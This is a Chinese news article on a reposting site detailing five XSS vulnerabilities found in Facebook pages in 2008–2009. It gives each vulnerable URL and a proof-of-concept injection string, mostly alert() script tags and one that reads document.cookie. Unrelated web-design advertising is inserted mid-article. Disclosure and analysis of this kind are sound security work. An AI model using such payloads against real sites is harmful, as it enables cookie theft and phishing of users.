详解Facebook最新高危XSS安全漏洞

【.com 独家特稿】近期，Facebook惊现高危XSS安全漏洞，致使其用户遭受巨大威胁。本文将对这些漏洞发布进行详细介绍。
Facebook在2008年12月15日与2009年1月4日被曝出一系列高危XSS安全漏洞，Facebook众多的功能同时遭受牵连，如新用户注册、iPhone登录、密码重新设定，等等。

为托克托等地区用户提供了全套网页设计制作服务，及托克托网站建设行业解决方案。主营业务为做网站、网站设计、托克托网站设计，以传统方式定制建设网站，并提供域名空间备案等一条龙服务，秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求，就会得到认可，从而选择与我们长期合作。这样，我们也可以走得更远！

攻击者能够利用这些XSS漏洞攻击数以百万计的Facebook用户，例如散播恶意软件、广告软件和间谍软件等等。拜这些高危跨站点脚本攻击漏洞所赐，Facebook用户可能受到钓鱼攻击并导致ID失窃。截至本月5号为止，这些漏洞尚未得到修复，这些高危漏洞已经对用户的隐私构成了高度的威胁。

安全研究人员最近发现的有XSS漏洞的页面包括，开发人员页面、新用户注册页面、iphone登录页面以及应用程序页面。攻击者能够利用这些XSS漏洞攻击数以百万计的Facebook用户，例如散播恶意软件、广告软件和间谍软件等等。对于用户来说，为了远离这些威胁的攻击最好不要接受不认识的人员加为好友的请求，千万不要点击不明来源的链接。

原因是Facebook的个人概况中包含了许多个人信息，“好友”通过则这些信息足以发动有针对性的钓鱼攻击，或者向您发送有针对性的垃圾邮件。但是如果您点击了一个共享链接结果会怎样呢？很明显，对他们来说，您就不会有什么隐私了！！！为了安全和隐私起见，一定要注意您在社交网络上的个人简介。

下面我们对这些最新漏洞分析进行介绍：

1号XSS漏洞：

所在位置：http://www.new.facebook.com/r.php
问题页面的镜像：http://www.xssed.com/mirror/50947/
攻击性POST：reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar

2号XSS漏洞

所在位置：
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
问题页面的镜像：http://www.xssed.com/mirror/53885/
攻击性POST：
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

3号XSS漏洞

所在位置及攻击字符串：
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
问题页面的镜像：http://www.xssed.com/mirror/55268/

4号XSS漏洞：

所在位置：http://developers.facebook.com/tools.php?fbml
问题页面的镜像：http://www.xssed.com/mirror/55392/
攻击性POST：
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
Hey you all! Our best wishes for 2009!!! ???? ????

5号XSS漏洞：

这是Facebook的Reset Password页面近期再次出现危险的跨站点脚本攻击安全漏洞。恶意用户可以网其中诸如代码并窃取数以百万计的Facebook用户的敏感个人信息。但愿这个漏洞能够得到迅速修复，好在以前他们的反应还是很迅速的。

所在位置：
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

问题页面的镜像：
http://www.xssed.com/mirror/55951/

快照：

【.COM 独家特稿，转载请注明出处及作者！】

【编辑推荐】

1. XSS攻击升温，Web业务安全面临更大挑战
2. XSS攻击防御技术白皮书
3. 长URL背后的杀机网站防范XSS攻击实录

分享名称：详解Facebook最新高危XSS安全漏洞
文章来源：http://www.mswzjz.cn/qtweb/news32/230932.html

攀枝花网站建设、攀枝花网站运维推广公司-贝锐智能，是专注品牌与效果的网络营销公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 贝锐智能